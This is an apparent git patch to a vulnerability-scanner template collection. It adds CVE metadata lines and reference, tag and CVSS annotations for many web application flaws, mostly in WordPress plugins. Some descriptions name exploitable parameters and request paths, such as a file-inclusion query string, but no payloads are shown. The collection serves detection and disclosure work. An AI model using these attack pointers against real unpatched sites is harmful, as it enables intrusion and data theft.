+{"ID":"CVE-2022-0949","Info":{"Name":"WP Block and Stop Bad Bots \u003c 6.930 - Unauthenticated SQLi","Severity":"critical","Description":"The Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection WordPress plugin before 6.930 does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0949.yaml"} {"ID":"CVE-2022-0952","Info":{"Name":"Sitemap by click5 \u003c 1.0.36 - Unauthenticated Arbitrary Options Update","Severity":"high","Description":"The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-0952.yaml"} {"ID":"CVE-2022-0954","Info":{"Name":"Microweber \u003c1.2.11 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0954.yaml"} {"ID":"CVE-2022-0963","Info":{"Name":"Microweber \u003c1.2.12 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0963.yaml"} {"ID":"CVE-2022-0968","Info":{"Name":"Microweber \u003c 1.2.12 - Integer Overflow (DOS)","Severity":"medium","Description":"The microweber application allows large characters to insert in the input field \"first \u0026 last name\" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name \u0026 last name input should be limited to 50 characters or max 100 characters.\n","Classification":{"CVSSScore":"5.5"}},"file_path":"cves/2022/CVE-2022-0968.yaml"} {"ID":"CVE-2022-1007","Info":{"Name":"WordPress Advanced Booking Calendar \u003c1.7.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1007.yaml"} +{"ID":"CVE-2022-1013","Info":{"Name":"Personal Dictionary \u003c 1.3.4 - Unauthenticated SQLi","Severity":"critical","Description":"The Personal Dictionary WordPress plugin before 1.3.4 fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to a blind SQL injection vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1013.yaml"} {"ID":"CVE-2022-1020","Info":{"Name":"WordPress WooCommerce \u003c3.1.2 - Arbitrary Function Call","Severity":"critical","Description":"WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1020.yaml"} {"ID":"CVE-2022-1040","Info":{"Name":"Sophos Firewall \u003c=18.5 MR3 - Remote Code Execution","Severity":"critical","Description":"Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1040.yaml"} {"ID":"CVE-2022-1054","Info":{"Name":"RSVP and Event Management \u003c 2.7.8 - Unauthenticated Entries Export","Severity":"medium","Description":"The RSVP and Event Management Plugin WordPress plugin before 2.7.8 does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of user registered for events","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-1054.yaml"} @@ -1557,11 +1577,14 @@ {"ID":"CVE-2022-38817","Info":{"Name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","Severity":"high","Description":"Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38817.yaml"} {"ID":"CVE-2022-38870","Info":{"Name":"Free5gc 3.2.1 - Information Disclosure","Severity":"high","Description":"Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38870.yaml"} {"ID":"CVE-2022-39195","Info":{"Name":"LISTSERV 17 - Cross-Site Scripting","Severity":"medium","Description":"LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the \"c\" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-39195.yaml"} +{"ID":"CVE-2022-3934","Info":{"Name":"Flat PM \u003c 3.0.13 - Reflected Cross-Site Scripting","Severity":"medium","Description":"The FlatPM WordPress plugin before 3.0.13 does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-3934.yaml"} {"ID":"CVE-2022-39952","Info":{"Name":"FortiNAC Unauthenticated Arbitrary File Write","Severity":"critical","Description":"A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-39952.yaml"} {"ID":"CVE-2022-39960","Info":{"Name":"Atlassian Jira addon Netic Group Export \u003c 1.0.3 - Unauthenticated Access","Severity":"medium","Description":"The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-39960.yaml"} {"ID":"CVE-2022-40083","Info":{"Name":"Labstack Echo 4.8.0 - Open Redirect","Severity":"critical","Description":"Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"cves/2022/CVE-2022-40083.yaml"} {"ID":"CVE-2022-40359","Info":{"Name":"Kae's File Manager \u003c=1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-40359.yaml"} {"ID":"CVE-2022-4050","Info":{"Name":"WordPress JoomSport \u003c5.2.8 - SQL Injection","Severity":"critical","Description":"WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-4050.yaml"} +{"ID":"CVE-2022-4060","Info":{"Name":"User Post Gallery \u003c= 2.19 - Unauthenticated RCE","Severity":"critical","Description":"The User Post Gallery WordPress plugin through 2.19 does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-4060.yaml"} +{"ID":"CVE-2022-4063","Info":{"Name":"InPost Gallery \u003c 2.1.4.1 - Unauthenticated LFI to RCE","Severity":"critical","Description":"The InPost Gallery WordPress plugin before 2.1.4.1 insecurely uses PHP's extract() function when rendering HTML views, allowing attackers to force the inclusion of malicious files \u0026 URLs, which may enable them to run code on servers.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-4063.yaml"} {"ID":"CVE-2022-40684","Info":{"Name":"Fortinet - Authentication Bypass","Severity":"critical","Description":"Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-40684.yaml"} {"ID":"CVE-2022-40734","Info":{"Name":"Laravel Filemanager v2.5.1 - Local File Inclusion","Severity":"medium","Description":"Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2022/CVE-2022-40734.yaml"} {"ID":"CVE-2022-40879","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-40879.yaml"} @@ -1574,25 +1597,31 @@ {"ID":"CVE-2022-42747","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-42747.yaml"} {"ID":"CVE-2022-42748","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-42748.yaml"} {"ID":"CVE-2022-42749","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-42749.yaml"} +{"ID":"CVE-2022-4301","Info":{"Name":"Sunshine Photo Cart \u003c 2.9.15 - Cross Site Scripting","Severity":"medium","Description":"The Sunshine Photo Cart WordPress plugin before 2.9.15 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-4301.yaml"} {"ID":"CVE-2022-43014","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43014.yaml"} {"ID":"CVE-2022-43015","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43015.yaml"} {"ID":"CVE-2022-43016","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43016.yaml"} {"ID":"CVE-2022-43017","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43017.yaml"} {"ID":"CVE-2022-43018","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43018.yaml"} +{"ID":"CVE-2022-4306","Info":{"Name":"Panda Pods Repeater Field \u003c 1.5.4 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a user having at least Contributor permission.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-4306.yaml"} {"ID":"CVE-2022-4447","Info":{"Name":"Fontsy \u003c= 1.8.6 - Unauthenticated SQLi","Severity":"critical","Description":"The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-4447.yaml"} {"ID":"CVE-2022-44877","Info":{"Name":"Centos Web Panel - Unauthenticated Remote Code Execution","Severity":"critical","Description":"RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-44877.yaml"} {"ID":"CVE-2022-45362","Info":{"Name":"Paytm Payment Gateway Plugin \u003c= 2.7.0 Server Side Request Forgery (SSRF)","Severity":"high","Description":"Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-45362.yaml"} +{"ID":"CVE-2022-45805","Info":{"Name":"WordPress Paytm Payment Gateway Plugin \u003c= 2.7.3 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information and creating new administrator accounts. This vulnerability has been fixed in version 2.7.7.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2022/CVE-2022-45805.yaml"} {"ID":"CVE-2022-45917","Info":{"Name":"ILIAS eLearning \u003c7.16 - Open Redirect","Severity":"medium","Description":"ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-45917.yaml"} {"ID":"CVE-2022-45933","Info":{"Name":"KubeView \u003c=0.1.31 - Information Disclosure","Severity":"critical","Description":"KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-45933.yaml"} {"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c= 1.2.22 Unauthenticated Command Injection","Severity":"critical","Description":"The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-46169.yaml"} {"ID":"CVE-2022-46381","Info":{"Name":"Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-46381.yaml"} +{"ID":"CVE-2022-46888","Info":{"Name":"NexusPHP - Cross-Site Scripting","Severity":"medium","Description":"NexusPHPbefore 1.7.33 allow remote attackers to inject arbitrary web script or HTML via the secret parameter in /login.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-46888.yaml"} {"ID":"CVE-2022-47945","Info":{"Name":"Thinkphp Lang - Local File Inclusion","Severity":"critical","Description":"ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47945.yaml"} {"ID":"CVE-2022-47966","Info":{"Name":"ManageEngine - Remote Command Execution","Severity":"critical","Description":"Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47966.yaml"} {"ID":"CVE-2022-47986","Info":{"Name":"Pre-Auth RCE in Aspera Faspex","Severity":"critical","Description":"IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47986.yaml"} {"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Configuration Exposure","Severity":"high","Description":"An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN530H4 M30H4.V5030.210121 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-48165.yaml"} +{"ID":"CVE-2022-4897","Info":{"Name":"BackupBuddy \u003c 8.8.3 - Cross Site Scripting","Severity":"medium","Description":"The BackupBuddy WordPress plugin before 8.8.3 does not sanitise and escape some parameters before outputting them back in various places, leading to Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-4897.yaml"} {"ID":"CVE-2023-0669","Info":{"Name":"GoAnywhere MFT - Remote Code Execution (ZeroDay)","Severity":"high","Description":"Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2023/CVE-2023-0669.yaml"} {"ID":"CVE-2023-23488","Info":{"Name":"Paid Memberships Pro \u003c 2.9.8 - Unauthenticated Blind SQLi","Severity":"critical","Description":"The Paid Memberships Pro WordPress Plugin, version \u003c 2.9.8, is affected by an unauthenticated SQL injection vulnerability in the 'code' parameter of the '/pmpro/v1/order' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2023/CVE-2023-23488.yaml"} {"ID":"CVE-2023-23489","Info":{"Name":"Easy Digital Downloads 3.1.0.2 \u0026 3.1.0.3 - Unauthenticated SQLi","Severity":"critical","Description":"The Easy Digital Downloads WordPress Plugin, versions 3.1.0.2 \u0026 3.1.0.3, is affected by an unauthenticated SQL injection vulnerability in the 's' parameter of its 'edd_download_search' action.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2023/CVE-2023-23489.yaml"} +{"ID":"CVE-2023-23492","Info":{"Name":"Login with Phone Number - Cross-Site Scripting","Severity":"medium","Description":"Login with Phone Number, versions \u003c 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2023/CVE-2023-23492.yaml"} {"ID":"CVE-2023-23752","Info":{"Name":"Joomla Improper AccessCheck in WebService Endpoint","Severity":"medium","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2023/CVE-2023-23752.yaml"} {"ID":"CVE-2023-24044","Info":{"Name":"Plesk Obsidian - Host Header Injection","Severity":"medium","Description":"A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2023/CVE-2023-24044.yaml"} {"ID":"CVE-2023-24322","Info":{"Name":"mojoPortal - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in the FileDialog.aspx component of mojoPortal v2.7.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2023/CVE-2023-24322.yaml"} From 4792f4f4400c51c3048c9368e01033e26177f752 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 5 Mar 2023 14:19:20 +0000 Subject: [PATCH 84/84] Auto Generated CVE annotations [Sun Mar 5 14:19:20 UTC 2023] :robot: --- cves/2015/CVE-2015-2755.yaml | 4 +++- cves/2015/CVE-2015-4062.yaml | 3 ++- cves/2015/CVE-2015-4063.yaml | 5 +++-- cves/2015/CVE-2015-9312.yaml | 10 ++++++++-- cves/2017/CVE-2017-14622.yaml | 7 ++++++- cves/2018/CVE-2018-16159.yaml | 5 +++-- cves/2021/CVE-2021-24145.yaml | 4 ++-- cves/2021/CVE-2021-24155.yaml | 4 ++-- cves/2021/CVE-2021-24169.yaml | 9 +++++++-- cves/2021/CVE-2021-24287.yaml | 9 +++++++-- cves/2021/CVE-2021-24347.yaml | 8 ++++---- cves/2021/CVE-2021-24554.yaml | 3 ++- cves/2021/CVE-2021-24875.yaml | 2 +- cves/2021/CVE-2021-24931.yaml | 4 ++-- cves/2021/CVE-2021-25067.yaml | 2 +- cves/2021/CVE-2021-27520.yaml | 11 +++++++++-- cves/2022/CVE-2022-0693.yaml | 2 +- cves/2022/CVE-2022-0760.yaml | 2 +- cves/2022/CVE-2022-0949.yaml | 2 +- cves/2022/CVE-2022-1013.yaml | 2 +- cves/2022/CVE-2022-3934.yaml | 2 +- cves/2022/CVE-2022-4060.yaml | 2 +- cves/2022/CVE-2022-4063.yaml | 2 +- cves/2022/CVE-2022-46888.yaml | 8 +++++++- cves/2023/CVE-2023-23492.yaml | 7 +++++-- vulnerabilities/wordpress/3d-print-lite-xss.yaml | 2 +- vulnerabilities/wordpress/wp-touch-redirect.yaml | 2 +- 27 files changed, 83 insertions(+), 40 deletions(-) diff --git a/cves/2015/CVE-2015-2755.yaml b/cves/2015/CVE-2015-2755.yaml index 86e83ffbed..6bf534cb1e 100644 --- a/cves/2015/CVE-2015-2755.yaml +++ b/cves/2015/CVE-2015-2755.yaml @@ -9,9 +9,11 @@ info: reference: - https://packetstormsecurity.com/files/131155/ - https://nvd.nist.gov/vuln/detail/https://nvd.nist.gov/vuln/detail/CVE-2015-2755 + - http://packetstormsecurity.com/files/131155/WordPress-Google-Map-Travel-3.4-XSS-CSRF.html + - http://packetstormsecurity.com/files/130960/WordPress-AB-Google-Map-Travel-CSRF-XSS.html metadata: verified: "true" - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map + tags: cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,cve requests: - raw: diff --git a/cves/2015/CVE-2015-4062.yaml b/cves/2015/CVE-2015-4062.yaml index 6c59c3809c..99f4b05cd3 100644 --- a/cves/2015/CVE-2015-4062.yaml +++ b/cves/2015/CVE-2015-4062.yaml @@ -10,6 +10,7 @@ info: - https://packetstormsecurity.com/files/132038/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4062 - https://wordpress.org/plugins/newstatpress + - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html remediation: | Update to plugin version 0.9.9 or latest classification: @@ -19,7 +20,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2015,sqli,wordpress,wp-plugin,wp,authenticated,newstatpress + tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp requests: - raw: diff --git a/cves/2015/CVE-2015-4063.yaml b/cves/2015/CVE-2015-4063.yaml index 75d5e53fe3..9f55dbcec1 100644 --- a/cves/2015/CVE-2015-4063.yaml +++ b/cves/2015/CVE-2015-4063.yaml @@ -6,14 +6,15 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in includes/nsp_search.php in the NewStatPress plugin before 0.9.9 for WordPress allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php. - remediation: Update to plugin version 0.9.9 or latest. reference: - https://packetstormsecurity.com/files/132038/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4063 - https://wordpress.org/plugins/newstatpress/ + - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html + remediation: Update to plugin version 0.9.9 or latest. metadata: verified: "true" - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress + tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm requests: - raw: diff --git a/cves/2015/CVE-2015-9312.yaml b/cves/2015/CVE-2015-9312.yaml index 672bce98df..80aaf13074 100644 --- a/cves/2015/CVE-2015-9312.yaml +++ b/cves/2015/CVE-2015-9312.yaml @@ -6,14 +6,20 @@ info: severity: medium description: | The NewStatPress plugin utilizes on lines 28 and 31 of the file ‘includes/nsp_search.php’ several variables from the $_GET scope, without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to trigger a Reflected XSS attack. - remediation: Fixed in version 1.0.6 reference: - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 - https://nvd.nist.gov/vuln/detail/CVE-2015-9312 - https://g0blin.co.uk/g0blin-00057/ + - https://wordpress.org/plugins/newstatpress/#developers + remediation: Fixed in version 1.0.6 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2015-9312 + cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,authenticated + tags: cve2015,xss,authenticated,wp,newstatpress,wpscan,cve,wordpress,wp-plugin requests: - raw: diff --git a/cves/2017/CVE-2017-14622.yaml b/cves/2017/CVE-2017-14622.yaml index 74dfe4884c..43edfc752f 100644 --- a/cves/2017/CVE-2017-14622.yaml +++ b/cves/2017/CVE-2017-14622.yaml @@ -11,9 +11,14 @@ info: - http://www.securityfocus.com/bid/101050 - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-14622 + cwe-id: CWE-79 metadata: verified: "true" - tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated + tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm requests: - raw: diff --git a/cves/2018/CVE-2018-16159.yaml b/cves/2018/CVE-2018-16159.yaml index e9bf735a6d..6e68fac189 100644 --- a/cves/2018/CVE-2018-16159.yaml +++ b/cves/2018/CVE-2018-16159.yaml @@ -6,11 +6,12 @@ info: severity: critical description: | The Gift Vouchers plugin through 2.0.1 for WordPress allows SQL Injection via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. - remediation: Fixed in version 4.1.8 reference: - https://wpscan.com/vulnerability/9117 - https://wordpress.org/plugins/gift-voucher/ - https://nvd.nist.gov/vuln/detail/CVE-2018-16159 + - https://www.exploit-db.com/exploits/45255/ + remediation: Fixed in 